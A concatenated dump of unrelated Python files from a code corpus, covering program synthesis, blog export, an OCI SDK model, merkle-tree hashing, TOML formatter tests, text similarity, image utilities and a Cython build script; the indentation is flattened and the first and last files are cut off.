solver = Solver()
solver.add(result)
sampleOutput = []
for sample in self.Samples:
solver.push()
for arg in self.VarTable:
if arg in sample:
solver.add(self.VarTable[arg] == sample[arg])
solver.check()
model = solver.model()
sampleOutput.append(model[resultVar].as_long())
solver.pop()
hashIndex = str(sampleOutput)
if hashIndex not in self.hashTable:
self.hashTable[hashIndex] = []
else:
for otherVar in self.hashTable[hashIndex]:
solver.push()
spec = "(assert (not (= %s %s)))"%(str(resultVar), translator.toString(otherVar))
solver.add(parse_smt2_string(spec, decls=self.VarTable))
if solver.check() == unsat:
return False
solver.pop()
#print(var)
self.hashTable[hashIndex].append(var)
self.Value[depth].append(var)
return True
def extendValue(self):
depth = len(self.Value)
self.Value.append([])
for operatorType in self.Operators:
resultType = operatorType[1]
argument = operatorType[2]
if len(argument) != 2 or resultType != 'Int': continue
for lsize in range(depth):
for rsize in range(depth - lsize):
for operator in operatorType[0]:
for lTerm in self.Value[lsize]:
for rTerm in self.Value[rsize]:
if not chcekMerge(operator, lTerm, rTerm): continue
self.addNewValue([operator, lTerm, rTerm], depth)
def getPossibleValue(Operators, Expr, Terminals):
SynFunExpr, VarTable, FunDefMap, Constraints = translator.ReadQuery(Expr)
returnType = SynFunExpr[3]
functionCallDic = {}
ReplacedConsInfo = []
for i in range(len(Constraints)):
ReplacedConsInfo.append(replaceFunctionCall(Constraints[i], functionCallDic, SynFunExpr[1], SynFunExpr[3], VarTable))
ReplacedConsSet = getConsSet(ReplacedConsInfo)
# pprint.pprint(ReplacedConsSet)
resultSet = []
argVarTable = {}
for arg in SynFunExpr[2]:
declareVar(arg[1], arg[0], argVarTable)
Samples = []
sampleNum = 30
for _ in range(sampleNum):
sample = {}
for arg in SynFunExpr[2]:
value = False
if arg[1] == 'Bool':
value = random.randint(0, 1) == 0
else:
value = random.randint(0, 100)
sample[arg[0]] = value
Samples.append(sample)
Value = ValueSet(argVarTable, Samples, Operators)
if returnType == 'Bool':
resultSet = ['true', 'false']
else:
depth = 0
argVarTable["__result"] = Int("__result")
for terminal in Terminals['Int']:
Value.addNewValue(terminal, depth)
#print(Value)
while True:
resultSet += Value.get(depth)
#print(resultSet)
if isValueSetFull(resultSet, functionCallDic, SynFunExpr[2], VarTable, ReplacedConsSet):
break
depth += 1
resultSet = simplifyResultSet(resultSet, [], functionCallDic, SynFunExpr[2], VarTable, ReplacedConsSet)
return resultSet, Value
def findPossibleValue(bmExpr):
SynFunExpr = []
StartSym = 'My-Start-Symbol' # virtual starting symbol
for expr in bmExpr:
if len(expr) == 0:
continue
elif expr[0] == 'synth-fun':
SynFunExpr = expr
FuncDefine = ['define-fun'] + SynFunExpr[1:4] # copy function signature
Productions = {StartSym: []}
ReturnType = SynFunExpr[3]
Type = {StartSym: SynFunExpr[3]} # set starting symbol's return type
Terminals = {'Int': [], 'Bool': []}
Operators = []
for NonTerm in SynFunExpr[4]: # SynFunExpr[4] is the production rule
NTName = NonTerm[0]
NTType = NonTerm[1]
assert NTType in ['Int', 'Bool']
if NTType == Type[StartSym]:
Productions[StartSym].append(NTName)
Type[NTName] = NTType
# Productions[NTName] = NonTerm[2]
Productions[NTName] = []
for NT in NonTerm[2]:
if type(NT) == tuple:
Productions[NTName].append(str(NT[1])) # deal with ('Int',0). You can also utilize type information, but you will suffer from these tuples.
else:
Productions[NTName].append(NT)
operatorTable = {}
for NonTerm in SynFunExpr[4]:
for NT in NonTerm[2]:
current = NT
if type(NT) == tuple:
current = str(NT[1])
if type(current) == str:
if current not in Type and current not in Terminals[NonTerm[1]]:
Terminals[NonTerm[1]].append(current)
else:
operatorArgs = []
for i in NT[1:]:
if i in Type:
operatorArgs.append([Type[i]])
else:
operatorArgs.append(i)
operatorStr = str([NonTerm[1], operatorArgs])
if operatorStr in operatorTable:
operatorLoc = operatorTable[operatorStr]
Operators[operatorLoc][0].append(NT[0])
else:
operator = [[NT[0]], NonTerm[1]]
operator.append(operatorArgs)
operatorTable[operatorStr] = len(Operators)
Operators.append(operator)
Operators = simplifyOperator(Operators)
possibleValue, _ = getPossibleValue(Operators, bmExpr, Terminals)
return possibleValue
|
the-stack_106_15917
|
#!/usr/bin/env python3
#
# Consolidate all the raw Blogger JSON files into a single, simplified JSON file.
#
from collections import OrderedDict
import html
import io
import json
import sys
import lxml.etree as ET
import lxml.html
import re
import feeds
import util
posts = feeds.json_post_entries_list()
output = []
for jpost in posts:
npost = OrderedDict()
output.append(npost)
npost["postid"] = re.match(r"tag:blogger.com,1999:blog-27481991.post-(\d+)$", jpost["id"]["$t"]).group(1)
assert jpost["title"]["type"] == "text"
npost["title"] = jpost["title"]["$t"]
(link,) = [x for x in jpost["link"] if x["rel"] == "alternate"]
npost["title_formatted"] = link["title"]
m = re.match(r"http://thearchdruidreport\.blogspot\.com/(20../../.*\.html)$", link["href"])
url = "https://thearchdruidreport.blogspot.com/" + m.group(1)
npost["url"] = url
npost["published"] = jpost["published"]["$t"] # e.g.: 2017-03-08T13:28:00.001-08:00
npost["updated"] = jpost["updated"]["$t"] # e.g.: 2017-03-08T13:32:19.336-08:00
assert jpost["content"]["type"] == "html"
npost["content"] = jpost["content"]["$t"]
npost["comments"] = []
for jcomment in feeds.comments_json(npost["postid"]):
ncomment = OrderedDict()
npost["comments"].append(ncomment)
ncomment["commentid"] = re.match(r"tag:blogger.com,1999:blog-27481991.post-(\d+)$", jcomment["id"]["$t"]).group(1)
(author,) = jcomment["author"]
ncomment["author"] = author["name"]["$t"]
ncomment["profile"] = author["uri"]["$t"]
avatar_url = author["gd$image"]["src"]
avatar_size = (int(author["gd$image"]["width"]), int(author["gd$image"]["height"]))
small_avatar = avatar_size[0] < 30 and avatar_size[1] < 30
if small_avatar:
if avatar_size == (16, 16) and avatar_url == "http://img1.blogblog.com/img/b16-rounded.gif":
ncomment["avatar"] = {"type": "blogger"}
elif avatar_size == (16, 16) and avatar_url == "http://img1.blogblog.com/img/openid16-rounded.gif":
ncomment["avatar"] = {"type": "openid"}
else:
raise RuntimeError("Invalid avatar info on comment (%s/%s, %s, %s)" % (
npost["postid"], ncomment["commentid"], avatar_url, avatar_size))
else:
ncomment["avatar"] = {"type": "url", "size": avatar_size, "url": avatar_url}
ncomment["published"] = jcomment["published"]["$t"]
ncomment["updated"] = jcomment["updated"]["$t"]
(display_time,) = [p for p in jcomment["gd$extendedProperty"] if p["name"] == "blogger.displayTime"]
ncomment["display_time"] = display_time["value"]
ncomment["comment_removed"] = (
len([p for p in jcomment["gd$extendedProperty"] if
(p["name"], p["value"]) == ("blogger.contentRemoved", "true")]) > 0)
related = [x for x in jcomment["link"] if x["rel"] == "related"]
if len(related) > 0:
(related,) = related
related = re.match(r"http://www\.blogger\.com/feeds/27481991/\d+/comments/default/(\d+)\?v=2$", related["href"])
ncomment["in_reply_to"] = related.group(1)
else:
ncomment["in_reply_to"] = None
ncomment["title"] = jcomment["title"]["$t"]
assert jcomment["content"]["type"] == "html"
ncomment["content"] = jcomment["content"]["$t"]
#html_parser = ET.HTMLParser()
#html = ET.HTML(content)
# doc = ET.parse(io.StringIO(content), html_parser)
# print(type(doc))
#print(ET.tostring(html))
#e = lxml.html.fragment_fromstring(content, create_parent="p")
#print(e)
#break
util.set_file_text("blog.json", json.dumps(output, indent=2))
|
the-stack_106_15918
|
import numpy as py
print("Input: ",end="")
arr = py.array(input().split()).astype(int)
def count(arr, low, high):
while high >= low:
mid = (high + low)//2
if (arr[mid] == 1 and (mid == 0 or arr[mid - 1] == 0)):
return mid
if arr[mid]==1:
high = mid-1
else:
low = mid+1
return -1
print("Output:",count(arr, 0, len(arr)-1))
|
the-stack_106_15922
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class BaseTag(object):
"""
Represents the association of an object to a term. Tags are immutable.
"""
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "CREATING"
LIFECYCLE_STATE_CREATING = "CREATING"
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "ACTIVE"
LIFECYCLE_STATE_ACTIVE = "ACTIVE"
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "INACTIVE"
LIFECYCLE_STATE_INACTIVE = "INACTIVE"
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "UPDATING"
LIFECYCLE_STATE_UPDATING = "UPDATING"
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "DELETING"
LIFECYCLE_STATE_DELETING = "DELETING"
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "DELETED"
LIFECYCLE_STATE_DELETED = "DELETED"
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "FAILED"
LIFECYCLE_STATE_FAILED = "FAILED"
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "MOVING"
LIFECYCLE_STATE_MOVING = "MOVING"
def __init__(self, **kwargs):
"""
Initializes a new BaseTag object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param key:
The value to assign to the key property of this BaseTag.
:type key: str
:param name:
The value to assign to the name property of this BaseTag.
:type name: str
:param term_key:
The value to assign to the term_key property of this BaseTag.
:type term_key: str
:param term_path:
The value to assign to the term_path property of this BaseTag.
:type term_path: str
:param term_description:
The value to assign to the term_description property of this BaseTag.
:type term_description: str
:param lifecycle_state:
The value to assign to the lifecycle_state property of this BaseTag.
Allowed values for this property are: "CREATING", "ACTIVE", "INACTIVE", "UPDATING", "DELETING", "DELETED", "FAILED", "MOVING"
:type lifecycle_state: str
:param time_created:
The value to assign to the time_created property of this BaseTag.
:type time_created: datetime
:param created_by_id:
The value to assign to the created_by_id property of this BaseTag.
:type created_by_id: str
:param uri:
The value to assign to the uri property of this BaseTag.
:type uri: str
"""
self.swagger_types = {
'key': 'str',
'name': 'str',
'term_key': 'str',
'term_path': 'str',
'term_description': 'str',
'lifecycle_state': 'str',
'time_created': 'datetime',
'created_by_id': 'str',
'uri': 'str'
}
self.attribute_map = {
'key': 'key',
'name': 'name',
'term_key': 'termKey',
'term_path': 'termPath',
'term_description': 'termDescription',
'lifecycle_state': 'lifecycleState',
'time_created': 'timeCreated',
'created_by_id': 'createdById',
'uri': 'uri'
}
self._key = None
self._name = None
self._term_key = None
self._term_path = None
self._term_description = None
self._lifecycle_state = None
self._time_created = None
self._created_by_id = None
self._uri = None
@property
def key(self):
"""
**[Required]** Gets the key of this BaseTag.
Unique tag key that is immutable.
:return: The key of this BaseTag.
:rtype: str
"""
return self._key
@key.setter
def key(self, key):
"""
Sets the key of this BaseTag.
Unique tag key that is immutable.
:param key: The key of this BaseTag.
:type: str
"""
self._key = key
@property
def name(self):
"""
Gets the name of this BaseTag.
Name of the tag which matches the term name.
:return: The name of this BaseTag.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this BaseTag.
Name of the tag which matches the term name.
:param name: The name of this BaseTag.
:type: str
"""
self._name = name
@property
def term_key(self):
"""
Gets the term_key of this BaseTag.
Unique key of the related term.
:return: The term_key of this BaseTag.
:rtype: str
"""
return self._term_key
@term_key.setter
def term_key(self, term_key):
"""
Sets the term_key of this BaseTag.
Unique key of the related term.
:param term_key: The term_key of this BaseTag.
:type: str
"""
self._term_key = term_key
@property
def term_path(self):
"""
Gets the term_path of this BaseTag.
Path of the related term.
:return: The term_path of this BaseTag.
:rtype: str
"""
return self._term_path
@term_path.setter
def term_path(self, term_path):
"""
Sets the term_path of this BaseTag.
Path of the related term.
:param term_path: The term_path of this BaseTag.
:type: str
"""
self._term_path = term_path
@property
def term_description(self):
"""
Gets the term_description of this BaseTag.
Description of the related term.
:return: The term_description of this BaseTag.
:rtype: str
"""
return self._term_description
@term_description.setter
def term_description(self, term_description):
"""
Sets the term_description of this BaseTag.
Description of the related term.
:param term_description: The term_description of this BaseTag.
:type: str
"""
self._term_description = term_description
@property
def lifecycle_state(self):
"""
Gets the lifecycle_state of this BaseTag.
The current state of the tag.
Allowed values for this property are: "CREATING", "ACTIVE", "INACTIVE", "UPDATING", "DELETING", "DELETED", "FAILED", "MOVING"
:return: The lifecycle_state of this BaseTag.
:rtype: str
"""
return self._lifecycle_state
@lifecycle_state.setter
def lifecycle_state(self, lifecycle_state):
"""
Sets the lifecycle_state of this BaseTag.
The current state of the tag.
:param lifecycle_state: The lifecycle_state of this BaseTag.
:type: str
"""
allowed_values = ["CREATING", "ACTIVE", "INACTIVE", "UPDATING", "DELETING", "DELETED", "FAILED", "MOVING"]
if not value_allowed_none_or_none_sentinel(lifecycle_state, allowed_values):
raise ValueError(
"Invalid value for `lifecycle_state`, must be None or one of {0}"
.format(allowed_values)
)
self._lifecycle_state = lifecycle_state
@property
def time_created(self):
"""
Gets the time_created of this BaseTag.
The date and time the tag was created, in the format defined by `RFC3339`__.
Example: `2019-03-25T21:10:29.600Z`
__ https://tools.ietf.org/html/rfc3339
:return: The time_created of this BaseTag.
:rtype: datetime
"""
return self._time_created
@time_created.setter
def time_created(self, time_created):
"""
Sets the time_created of this BaseTag.
The date and time the tag was created, in the format defined by `RFC3339`__.
Example: `2019-03-25T21:10:29.600Z`
__ https://tools.ietf.org/html/rfc3339
:param time_created: The time_created of this BaseTag.
:type: datetime
"""
self._time_created = time_created
@property
def created_by_id(self):
"""
Gets the created_by_id of this BaseTag.
OCID of the user who created the tag.
:return: The created_by_id of this BaseTag.
:rtype: str
"""
return self._created_by_id
@created_by_id.setter
def created_by_id(self, created_by_id):
"""
Sets the created_by_id of this BaseTag.
OCID of the user who created the tag.
:param created_by_id: The created_by_id of this BaseTag.
:type: str
"""
self._created_by_id = created_by_id
@property
def uri(self):
"""
Gets the uri of this BaseTag.
URI to the tag instance in the API.
:return: The uri of this BaseTag.
:rtype: str
"""
return self._uri
@uri.setter
def uri(self, uri):
"""
Sets the uri of this BaseTag.
URI to the tag instance in the API.
:param uri: The uri of this BaseTag.
:type: str
"""
self._uri = uri
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
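# Illustrative usage sketch (not part of the generated SDK module): construct a
# BaseTag from keyword arguments, as described in the __init__ docstring, and
# read a few properties back.  The key/name values are made up for the demo.
if __name__ == "__main__":
    tag = BaseTag(key="example-tag-key", name="pii", lifecycle_state="ACTIVE")
    print(tag.key, tag.name, tag.lifecycle_state)
    print(repr(tag))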
|
the-stack_106_15924
|
# ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
import os
import json
import hashlib
from datetime import datetime
from os import listdir
from os.path import isfile, join
from collections import deque
HASH_FILE_CHUNK_SIZE = 65536
HASH_ALGORITHM = "sha512"
''' Create a merkle tree for the given directory path
The directory would typically represent a project directory'''
def create_merkletree(file_or_folder_path, exclude_function):
root = DirTreeNode("", "Directory",
datetime.fromtimestamp(os.path.getmtime(file_or_folder_path)).isoformat())
if os.path.isdir(file_or_folder_path):
folder_path = file_or_folder_path
_create_merkletree_helper(folder_path, root, exclude_function)
else:
file_path = file_or_folder_path
file_node = DirTreeNode(file_path,
"File",
datetime.fromtimestamp(os.path.getmtime(file_path)).isoformat())
hexdigest_hash, bytehash = _get_hash(os.path.normpath(file_path),
file_path,
"File")
if hexdigest_hash and bytehash:
file_node.add_hash(hexdigest_hash, bytehash)
root.add_child(file_node)
_populate_hashes(root)
return root
''' Populate hashes for directory nodes
by hashing the hashes of child nodes under them'''
def _populate_hashes(rootNode):
if (rootNode.is_file()):
return rootNode.bytehash
h = hashlib.new(HASH_ALGORITHM)
for child in rootNode.children:
if (child.is_file()):
h.update(child.bytehash)
else:
h.update(_populate_hashes(child))
rootNode.bytehash = h.digest()
rootNode.hexdigest_hash = h.hexdigest()
return h.digest()
''' Create a merkle tree for the given directory path
:param projectDir: Directory for which to create a tree.
:param rootNode: Root node .
Walks the directory and create a dirTree '''
def _create_merkletree_helper(projectDir, rootNode, exclude_function):
for f in sorted(listdir(projectDir)):
path = os.path.normpath(join(projectDir, f))
if not exclude_function(path):
if isfile(join(projectDir, f)):
newNode = DirTreeNode(f, "File", datetime.fromtimestamp(os.path.getmtime(path)).isoformat())
hexdigest_hash, bytehash = _get_hash(path, f, "File")
if hexdigest_hash and bytehash:
newNode.add_hash(hexdigest_hash, bytehash)
rootNode.add_child(newNode)
else:
newNode = DirTreeNode(f, "Directory", datetime.fromtimestamp(os.path.getmtime(path)).isoformat())
rootNode.add_child(newNode)
_create_merkletree_helper(path, newNode, exclude_function)
def _get_hash(filePath, name, file_type):
h = hashlib.new(HASH_ALGORITHM)
if not os.access(filePath, os.R_OK):
        print(filePath, os.R_OK)
print("Cannot access file, so excluded from snapshot: {}".format(filePath))
return (None, None)
with open(filePath, 'rb') as f:
while True:
data = f.read(HASH_FILE_CHUNK_SIZE)
if not data:
break
h.update(data)
h.update(name.encode('utf-8'))
h.update(file_type.encode('utf-8'))
return (h.hexdigest(), h.digest())
''' We compute both hexdigest and digest for hashes.
digest (bytes) is used so that we can compute the bytehash of a parent directory based on bytehash of its children
hexdigest is used so that we can serialize the tree using json'''
class DirTreeNode(object):
def __init__(self, name=None, file_type=None, timestamp=None, hexdigest_hash=None, bytehash=None):
self.file_type = file_type
self.name = name
self.timestamp = timestamp
self.children = []
self.hexdigest_hash = hexdigest_hash
self.bytehash = bytehash
def load_children_from_dict(self, node_dict):
if (len(node_dict.items()) == 0):
return
self.name = node_dict['name']
self.file_type = node_dict['type']
self.hexdigest_hash = node_dict['hash']
self.timestamp = node_dict['timestamp']
for child_name, child in node_dict['children'].items():
node = DirTreeNode()
node.load_children_from_dict(child)
self.add_child(node)
return self
def load_children_from_json(self, node_dict):
self.name = node_dict['name']
self.file_type = node_dict['type']
self.hexdigest_hash = node_dict['hash']
self.timestamp = node_dict['timestamp']
for child in node_dict['children']:
node = DirTreeNode()
node.load_children_from_json(child)
self.add_child(node)
return self
def load_object_from_dict(self, node_dict):
self.load_children_from_dict(node_dict)
def load_root_object_from_json_string(self, jsondata):
node_dict = json.loads(jsondata)
self.load_children_from_json(node_dict)
def add_hash(self, hexdigest_hash, bytehash):
self.hexdigest_hash = hexdigest_hash
self.bytehash = bytehash
def add_child(self, node):
self.children.append(node)
def is_file(self):
return self.file_type == "File"
''' Only for debugging purposes'''
def print_tree(self):
queue = deque()
print("Name: " + self.name)
print("Type: " + self.file_type)
for child in self.children:
print(' ' + child.name)
queue.append(child)
for i in queue:
i.print_tree()
''' Serialize merkle tree.
Serialize all fields except digest (bytes)
'''
class DirTreeJsonEncoder(json.JSONEncoder):
def default(self, obj):
if not isinstance(obj, DirTreeNode):
return super(DirTreeJsonEncoder, self).default(obj)
dict = obj.__dict__
dict.pop("bytehash", None)
dict['type'] = dict.pop('file_type')
dict['hash'] = dict.pop('hexdigest_hash')
return dict
class DirTreeJsonEncoderV2(json.JSONEncoder):
def default(self, obj):
if not isinstance(obj, DirTreeNode):
            return super(DirTreeJsonEncoderV2, self).default(obj)
dict = obj.__dict__
dict.pop("bytehash", None)
if 'file_type' in dict:
dict['type'] = dict.pop('file_type')
if 'hexdigest_hash' in dict:
dict['hash'] = dict.pop('hexdigest_hash')
if isinstance(dict['children'], list):
dict['children'] = {x.name: x for x in dict['children']}
return dict
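# Minimal usage sketch (illustrative, not part of the original module): hash the
# current working directory into a merkle tree, excluding nothing, and dump the
# start of its JSON serialization.  The path "." is an assumption for the demo.
if __name__ == "__main__":
    tree = create_merkletree(".", lambda path: False)
    print("root hash:", tree.hexdigest_hash)
    print(json.dumps(tree, cls=DirTreeJsonEncoder, indent=2)[:300])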
|
the-stack_106_15929
|
# !/usr/bin/env python3
import jieba
from gensim import corpora, models, similarities
# choice_item = [
# '不方便,在工作,稍等一会, 我不是很感兴趣, 能不能等会再打','方便, 好,可以聊一下,方便,感兴趣,挺好的,有什么事','不知道你说的啥']
choice_item = ['不方便','在工作','稍等一会','我不是很感兴趣', '能不能等会再打','方便', '好','可以聊一下','方便','感兴趣','挺好的','有什么事','不知道你说的啥']
choice_cut = []
for i in choice_item:
data1 = ''
this_data = jieba.cut(i)
for item in this_data:
data1 += item + ' '
choice_cut.append(data1)
docs = choice_cut
tall = [ [w1 for w1 in doc.split()] for doc in docs]
dictionary = corpora.Dictionary(tall)
corpus = [dictionary.doc2bow(text) for text in tall]
tfidf = models.TfidfModel(corpus)
print(tfidf)
num = len(dictionary.token2id.keys())
index = similarities.SparseMatrixSimilarity(tfidf[corpus], num_features=num)
while True:
choice_input = input('请问您现在方便吗?\n')
in_data = jieba.cut(choice_input)
new_doc = ''
for d in in_data:
new_doc += d + ' '
new_vec = dictionary.doc2bow(new_doc.split())
sim = index[tfidf[new_vec]]
    position = sim.argsort()[-1]
    print(choice_item[position])
print('\n')
|
the-stack_106_15931
|
from unittest import mock
import os
import pytest
import tomlfmt
here = os.path.dirname(__file__)
pyproject_toml = os.path.join(os.path.dirname(here), "pyproject.toml")
@pytest.fixture
def no_write():
"""utility for verifying that no files are written"""
def open_no_write(path, mode="r"):
assert mode == "r"
return open(path, mode)
with mock.patch.object(tomlfmt, "open", open_no_write):
yield
def test_tomlfmt(capsys, no_write):
tomlfmt.main([pyproject_toml])
out, err = capsys.readouterr()
assert out == open(pyproject_toml).read()
def test_no_files():
with pytest.raises(ValueError):
tomlfmt.format()
def test_inplace(capsys, tmpdir):
path = tmpdir.join("test.toml")
with path.open("w") as w:
with open(os.path.join(here, "test.toml")) as r:
w.write(r.read())
tomlfmt.format(str(path), inplace=True)
out, err = capsys.readouterr()
assert "✅" in err
assert out == ""
with path.open("r") as f:
result = f.read()
with open(os.path.join(here, "test.good.toml")) as f:
expected = f.read()
assert result == expected
def test_no_change_no_write(capsys, tmpdir, no_write):
path = tmpdir.join("test.toml")
with path.open("w") as w:
with open(os.path.join(here, "test.good.toml")) as r:
w.write(r.read())
tomlfmt.format(str(path), inplace=True)
out, err = capsys.readouterr()
assert "🎉" in err
assert out == ""
with path.open("r") as f:
result = f.read()
with open(os.path.join(here, "test.good.toml")) as f:
expected = f.read()
assert result == expected
def test_no_write_bad(capsys, no_write):
tomlfmt.format(__file__, inplace=True)
out, err = capsys.readouterr()
assert "❌" in err
assert out == ""
def test_no_out_bad(capsys, no_write):
tomlfmt.format(__file__, inplace=True)
out, err = capsys.readouterr()
assert out == ""
assert "❌" in err
|
the-stack_106_15932
|
import numpy as np
from matplotlib import pyplot as plt
import EmotionUtils
import tensorflow as tf
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string("data_dir",\
"EmotionDetector/",\
"Path to data files")
images = []
images = EmotionUtils.read_data(FLAGS.data_dir)
train_images = images[0]
train_labels = images[1]
valid_images = images[2]
valid_labels = images[3]
test_images = images[4]
print ("train images shape = ",train_images.shape)
print ("test images shape = ",test_images.shape)
image_0 = train_images[0]
label_0 = train_labels[0]
print ("image_0 shape = ",image_0.shape)
print ("label set = ",label_0)
image_0 = np.resize(image_0,(48,48))
plt.imshow(image_0, cmap='Greys_r')
plt.show()
|
the-stack_106_15933
|
# -*- coding: UTF-8 -*-
import numpy as np
import sys
def readPFM(fpath, expected_identifier="Pf"):
# PFM format definition: http://netpbm.sourceforge.net/doc/pfm.html
def _get_next_line(f):
next_line = f.readline().decode('utf-8').rstrip()
# ignore comments
while next_line.startswith('#'):
next_line = f.readline().rstrip()
return next_line
with open(fpath, 'rb') as f:
# header
identifier = _get_next_line(f)
if identifier != expected_identifier:
raise Exception('Unknown identifier. Expected: "%s", got: "%s".' % (expected_identifier, identifier))
try:
line_dimensions = _get_next_line(f)
dimensions = line_dimensions.split(' ')
width = int(dimensions[0].strip())
height = int(dimensions[1].strip())
except:
raise Exception('Could not parse dimensions: "%s". '
'Expected "width height", e.g. "512 512".' % line_dimensions)
try:
line_scale = _get_next_line(f)
scale = float(line_scale)
assert scale != 0
if scale < 0:
endianness = "<"
else:
endianness = ">"
except:
raise Exception('Could not parse max value / endianess information: "%s". '
'Should be a non-zero number.' % line_scale)
try:
data = np.fromfile(f, "%sf" % endianness)
data = np.reshape(data, (height, width))
data = np.flipud(data)
with np.errstate(invalid="ignore"):
data *= abs(scale)
except:
raise Exception('Invalid binary values. Could not create %dx%d array from input.' % (height, width))
return data
def write_pfm(data, fpath, scale=1, file_identifier=b'Pf', dtype="float32"):
# PFM format definition: http://netpbm.sourceforge.net/doc/pfm.html
data = np.flipud(data)
height, width = np.shape(data)[:2]
values = np.ndarray.flatten(np.asarray(data, dtype=dtype))
endianess = data.dtype.byteorder
if endianess == '<' or (endianess == '=' and sys.byteorder == 'little'):
scale *= -1
with open(fpath, 'wb') as file:
file.write((file_identifier))
file.write(('\n%d %d\n' % (width, height)).encode())
file.write(('%d\n' % scale).encode())
file.write(values)
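# Minimal round-trip sketch (illustrative, not part of the original module):
# write a small random float map to disk and read it back.  The file name is an
# assumption used only for demonstration.
if __name__ == "__main__":
    depth = np.random.rand(4, 6).astype(np.float32)
    write_pfm(depth, "example.pfm")
    restored = readPFM("example.pfm")
    print(np.allclose(depth, restored))   # expected: True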
|
the-stack_106_15935
|
from __future__ import print_function, division
import cv2
import numpy as np
from numba import jit
@jit
def copy_with_resize(src, dest, size):
'''
Copy an image with resizing
Parameters:
src - source
dest - destination
size - (width, height) tuple
'''
img = cv2.imread(src)
if img.shape[:2][::-1] != size:
img = cv2.resize(img, size)
cv2.imwrite(dest, img)
@jit
def mask_from_image_to_unet_label_fast(mask, n_classes):
labels = np.zeros(mask.shape + (n_classes,), dtype=np.uint8)
for r in range(mask.shape[0]):
for c in range(mask.shape[1]):
plane = mask[r,c]
# REVIEW: masks that come out of Weka may have junk in them!!
if plane >= n_classes:
if n_classes == 2:
labels[r, c, 1] = 1
else:
labels[r, c, 0] = 1
else:
labels[r, c, plane] = 1
return labels
def mask_from_image_to_unet_label(mask_src, mask_dest, size, n_classes):
'''
Convert mask from image to a numpy array usable for Unet
Parameters:
mask_src - source mask file (image)
mask_dest - destination file - saved numpy array
size - (width, height) tuple
n_classes - number of classes
'''
mask = cv2.imread(mask_src, cv2.IMREAD_GRAYSCALE)
if mask.shape[:2][::-1] != size:
mask = cv2.resize(mask, size)
labels = mask_from_image_to_unet_label_fast(mask, n_classes)
np.savez_compressed(mask_dest, labels=labels)
def unet_proba_to_class_masks(labels):
'''
Convert each entry in the label array of predictions from probability
to actual class-number mask
Parameters:
labels -- N x H x W x C (C - number of classes) numpy array
Returns:
N x H x W numpy array of masks
'''
if len(labels.shape) < 4:
return labels
return np.argmax(labels, axis=3)
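# Minimal sketch (illustrative, not part of the original module): turn a fake
# network output of shape (N, H, W, C) into per-pixel class masks, then expand
# one mask back into one-hot Unet labels.  All arrays are synthetic.
if __name__ == "__main__":
    proba = np.random.rand(2, 4, 4, 3)                 # N x H x W x C
    masks = unet_proba_to_class_masks(proba)           # N x H x W of class ids
    labels = mask_from_image_to_unet_label_fast(masks[0].astype(np.uint8), 3)
    print(masks.shape, labels.shape)                   # (2, 4, 4) (4, 4, 3)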
|
the-stack_106_15940
|
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
import os
import numpy as np
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
# Obtain the numpy include directory. This logic works across numpy versions.
try:
numpy_include = np.get_include()
except AttributeError:
numpy_include = np.get_numpy_include()
def customize_compiler_for_nvcc(self):
"""inject deep into distutils to customize how the dispatch
to gcc/nvcc works.
If you subclass UnixCCompiler, it's not trivial to get your subclass
injected in, and still have the right customizations (i.e.
distutils.sysconfig.customize_compiler) run on it. So instead of going
    the OO route, I have this. Note, it's kind of like a weird functional
    subclassing going on."""
    # tell the compiler it can process .cu
self.src_extensions.append('.cu')
    # save references to the default compiler_so and _compile methods
default_compiler_so = self.compiler_so
super = self._compile
# now redefine the _compile method. This gets executed for each
# object but distutils doesn't have the ability to change compilers
# based on source extension: we add it.
def _compile(obj, src, ext, cc_args, extra_postargs, pp_opts):
print(extra_postargs)
if os.path.splitext(src)[1] == '.cu':
# use the cuda for .cu files
self.set_executable('compiler_so', CUDA['nvcc'])
# use only a subset of the extra_postargs, which are 1-1 translated
# from the extra_compile_args in the Extension class
postargs = extra_postargs['nvcc']
else:
postargs = extra_postargs['gcc']
super(obj, src, ext, cc_args, postargs, pp_opts)
# reset the default compiler_so, which we might have changed for cuda
self.compiler_so = default_compiler_so
# inject our redefined _compile method into the class
self._compile = _compile
# run the customize_compiler
class custom_build_ext(build_ext):
def build_extensions(self):
customize_compiler_for_nvcc(self.compiler)
build_ext.build_extensions(self)
thisdir = os.path.dirname(os.path.abspath(__file__))
source_dir = os.path.join(thisdir, 'utils')
ext_modules = [
Extension(
"utils.cython_bbox",
[os.path.join(source_dir, "bbox.pyx")],
extra_compile_args={'gcc': ["-Wno-cpp", "-Wno-unused-function"]},
include_dirs=[numpy_include]
),
]
if __name__ == '__main__':
setup(
name='utils',
ext_modules=ext_modules,
# inject our custom trigger
cmdclass={'build_ext': custom_build_ext},
)
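# Typical invocation for this kind of setup script (not part of the original
# file): build the Cython extension in place so utils.cython_bbox can be
# imported straight from the repository root:
#
#   python setup.py build_ext --inplace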
|
the-stack_106_15941
|
import sys
import pathlib
field_type_mapping = {'CHAR': 'TEXT',
'INTEGER': 'INTEGER',
